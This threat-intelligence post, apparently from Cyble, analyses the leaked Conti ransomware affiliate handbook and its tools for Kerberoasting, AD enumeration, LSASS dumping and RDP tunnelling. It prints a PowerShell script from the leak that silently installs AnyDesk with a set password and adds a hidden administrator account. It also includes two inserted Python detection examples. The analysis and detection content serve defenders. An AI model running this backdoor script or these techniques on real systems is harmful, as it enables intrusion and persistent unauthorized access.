Conti Secrets Hacker’s Handbook Leaked

An ex-affiliate of the Conti ransomware group released the training material that the Conti core team used to train affiliates to conduct ransomware attacks. A screenshot of the post is shown below.

Figure 1 post by TA

The Threat Actor (TA) claimed that they posted it because Conti did not pay them in full for their work. The ex-affiliate claims to have received only $1500 for all the work they did for Conti.

Below is a screenshot of the claims made by the TA.

Figure 2 claims by TA

In June 2021, Conti had published a post on one of the cybercrime forums where they seemed to be recruiting penetration testers.

Figure 3 recruiting penetration testers

Upon analyzing the documents, we found that the group's basic modus operandi (MO) is simple: the core team manages the malware and maintains the onion websites, while the recruited affiliates are tasked with finding vulnerable networks and encrypting them. Conti also provides training materials to its affiliates, which include step-by-step techniques for compromising networks and maintaining access.

Figure 4 CONTI-MO

Below is the screenshot of all the images and files leaked by the associates.

Figure 5 Content of ManualsAndSoftware.rar

We have compiled a list of tools that Conti has created training materials for:

  • Cobalt Strike

Cobalt Strike is a security tool created with the intent of helping penetration testers or red teamers conduct security assessments. Recently, however, cybercriminals have started using this tool because of its rich features and functionalities. The features of this tool range from establishing an initial foothold and initiating a lateral movement to creating persistence on infected systems. Generally, cybercriminals use the cracked version of this tool.

Here, too, the Conti group has used a cracked version.

Figure 6 CobaltStrike used by Conti Group

  • alias.rc (custom Metasploit resource script file)

This script generates aliases for various auxiliary and post-exploitation modules available in Metasploit, so that they can be called by short names. The figure below shows the aliases created in Metasploit by loading the resource script.

Figure 7 Aliases created in Metasploit by using alias.rc resource script

  • Invoke-Kerberoast.ps1

“Invoke-Kerberoast” is a tool developed by harmj0y to launch Kerberoast attacks. A Kerberoast attack first queries the domain controller for the list of Service Principal Names (SPNs) associated with service accounts created for various services, such as SQL.

Once the attacker has the list of SPNs, they can request a Ticket Granting Service (TGS) ticket for each of them. Once a TGS ticket has been received, the attacker can use various techniques to export it from the operating system’s memory and crack it offline to recover the plaintext password of the service account.

Invoke-Kerberoast is an all-in-one PowerShell tool that covers the whole chain, from querying the domain controller for SPNs to exporting the TGS hash data for cracking.

Figure 8 Invoking Kerberoast PowerShell Tool

  • AdFind
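As an added defender-side example (not code from the Cyble post or from the leaked Conti material), the Python below applies the usual Kerberoasting detection logic to constructed Windows Security event 4769 records: one account requesting RC4-encrypted (0x17) service tickets for several distinct service accounts within a short window. The record field names, account names and timestamps are assumptions made for the example.

```python
# Kerberoasting detector over Windows Security event 4769 (Kerberos service
# ticket request). 4769 is only logged when "Audit Kerberos Service Ticket
# Operations" is enabled on the domain controllers.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records; field names are an assumption that mirrors the
# event data (TargetUserName, ServiceName, TicketEncryptionType, Status).
EVENTS = [
    {"time": "2021-08-05T10:00:01", "account": "jdoe@CORP.LOCAL",
     "service": "svc_sql", "enc": "0x17", "status": "0x0"},
    {"time": "2021-08-05T10:00:02", "account": "jdoe@CORP.LOCAL",
     "service": "svc_web", "enc": "0x17", "status": "0x0"},
    {"time": "2021-08-05T10:00:02", "account": "jdoe@CORP.LOCAL",
     "service": "svc_backup", "enc": "0x17", "status": "0x0"},
    {"time": "2021-08-05T10:00:03", "account": "jdoe@CORP.LOCAL",
     "service": "svc_sql", "enc": "0x17", "status": "0x0"},  # repeat SPN
    {"time": "2021-08-05T10:07:00", "account": "asmith@CORP.LOCAL",
     "service": "svc_sql", "enc": "0x12", "status": "0x0"},  # AES, normal use
    {"time": "2021-08-05T10:07:30", "account": "asmith@CORP.LOCAL",
     "service": "FS01$", "enc": "0x12", "status": "0x0"},    # computer account
    {"time": "2021-08-05T10:09:00", "account": "asmith@CORP.LOCAL",
     "service": "krbtgt", "enc": "0x12", "status": "0x0"},
]

def find_kerberoast(events, window=timedelta(minutes=5), min_spns=3):
    """Return {account: sorted service names} for accounts that obtained RC4
    tickets for at least min_spns distinct service accounts within window."""
    by_account = defaultdict(list)
    for e in events:
        # Only successful requests with RC4 tickets (the crackable case).
        if e["status"] != "0x0" or e["enc"] != "0x17":
            continue
        # krbtgt renewals and computer accounts (trailing $) are not targets.
        if e["service"] == "krbtgt" or e["service"].endswith("$"):
            continue
        by_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    hits = {}
    for acct, reqs in by_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                hits[acct] = sorted(spns)
                break
    return hits

if __name__ == "__main__":
    print(find_kerberoast(EVENTS))
```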

AdFind is a post-exploitation tool. It is used once the attacker has a foothold on a domain-joined client machine. Using this tool, the attacker can retrieve details such as the Active Directory user list, computer list, organizational units, etc.

Figure 9 Executing adfind.exe

  • PowerView

PowerView is another post-exploitation tool. It can be used once the attacker has a foothold in the domain network. Leveraging this tool, the attacker can perform multiple tasks, including enumerating the domain controller and extracting details such as SPNs, domain computers, policies, forest information, etc.

  • RouterScan

RouterScan is a scanning tool used to identify router devices in a given range of IPs. It can show details such as the device type/information, Extended Service Set Identifier (ESSID), Basic Service Set Identifier (BSSID), etc. Additionally, it tries default login/password combinations from a standard list bundled with the tool.

Figure 10 Running RouterScan tool

  • PowerUpSQL

PowerUpSQL is yet another post-exploitation tool, created to enumerate and attack SQL Server instances. One example is executing a system command on a target MSSQL server by leveraging the xp_cmdshell extended stored procedure present in the MSSQL service.

  • NGROK

In one of the documents named “RDP NGROK.txt,” the attacker has described the method to access the victim machine over the internet via the Remote Desktop Protocol (RDP) port with the help of the NGROK service.

  • rundll32.exe

“rundll32.exe” is a Microsoft Windows operating system component. Using “rundll32.exe”, the attacker can call the MiniDump API (Application Programming Interface) function exported by the comsvcs.dll library to generate a memory dump of the LSASS.exe process. Later, information such as Windows password hashes and plaintext passwords can be extracted from this dump using tools like Mimikatz.

  • AnyDesk

The attacker used the PowerShell code below to install AnyDesk as a backdoor, allowing the victim machine to be controlled from a remote machine.

Function AnyDesk {
    mkdir "C:\ProgramData\AnyDesk"
    # Download AnyDesk (URL defanged as in the leaked document)
    $clnt = new-object System.Net.WebClient
    $url = "http:[//]download[.]anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)
    # Silent install, configured to start with Windows
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
    # Set an unattended-access password
    cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
    # Create a local administrator account and hide it from the logon screen
    net user oldadministrator "qc69t4B#Z0kE3" /add
    net localgroup Administrators oldadministrator /ADD
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

    # Print the AnyDesk ID needed to connect to this machine
    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}

Table 1 PowerShell Code to Install AnyDesk
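As an added example from the detection side (not code from the post or from the leaked playbook), the Python below runs simple command-line rules over constructed process-creation records, of the kind Sysmon Event ID 1 or Security event 4688 with command-line auditing would provide, to flag the rundll32/comsvcs.dll MiniDump of LSASS described above and the silent install, set-password and hidden-account steps of the AnyDesk script in Table 1. The record field names, hostnames, rule names and sample password are assumptions made for the example.

```python
import re

# Constructed sample process-creation records (field names are assumptions;
# real telemetry would come from Sysmon Event ID 1 or Security 4688).
PROCESS_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"},
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo s3cret | C:\ProgramData\anydesk.exe --set-password"},
    {"host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f'},
    {"host": "WS02", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},  # benign
    {"host": "WS02", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\Software\Example" /v Foo /t REG_DWORD /d 1 /f'},  # benign
]

# Each rule is (name, case-insensitive regex over the full command line).
RULES = [
    ("lsass_minidump_comsvcs", re.compile(r"rundll32.*comsvcs\.dll.*minidump", re.I)),
    ("anydesk_silent_install", re.compile(r"anydesk\.exe.*--install.*--silent", re.I)),
    ("anydesk_set_password", re.compile(r"anydesk\.exe.*--set-password", re.I)),
    # A 0 value under Winlogon\SpecialAccounts\Userlist hides the account from the logon screen.
    ("hidden_logon_account", re.compile(r"reg\s+add.*specialaccounts\\userlist.*/d\s+0(\s|$)", re.I)),
]

def match_rules(events):
    """Return [(host, rule_name)] for every record whose command line matches a rule."""
    hits = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e["cmdline"]):
                hits.append((e["host"], name))
    return hits

def hosts_with_backdoor_chain(events):
    """Hosts showing both the AnyDesk password step and the hidden admin account,
    i.e. the complete persistence pattern of the Table 1 script."""
    by_host = {}
    for host, name in match_rules(events):
        by_host.setdefault(host, set()).add(name)
    needed = {"anydesk_set_password", "hidden_logon_account"}
    return sorted(h for h, names in by_host.items() if needed <= names)

if __name__ == "__main__":
    for hit in match_rules(PROCESS_EVENTS):
        print(hit)
```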

  • TOR

Conti uses TOR as a SOCKS proxy to hide its traffic and maintain anonymity.

  • Metasploit

Metasploit is a security tool used by penetration testers, exploit developers, red teamers, etc. The Metasploit tool provides a platform containing many exploits related to various popular services and applications. Additionally, it also holds payloads and auxiliary modules for various other security assessment purposes.

  • Additional script/tools/techniques used by Conti
| Sr. No | Script/Tools/Techniques | Description |
|---|---|---|
| 1 | script.sh | Sort details from ad_computers.txt and ad_user.txt generated by AdFind.exe |
| 2 | Hash in ntds.dit | Extracting hashes from the ntds.dit file |
| 3 | netscan | Scan a range of IPs to find shared folders |
| 4 | p.bat | Iterate through the domain.txt file and ping every IP to find which ones are live |
| 5 | sqlcmd utility | The utility is used to run SQL commands remotely |
| 6 | net user | Enumerate local users and domain users |
| 7 | wmic | Remotely connect to a machine and execute various commands |
| 8 | Armitage | A GUI for the Metasploit tool |
| 9 | Mimikatz | Extracts hashes and passwords from memory, performs DCSync, etc. |

Table 2 Misc Tools Which are Part of the Conti Playbook

About Us:

Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit https://cyble.com.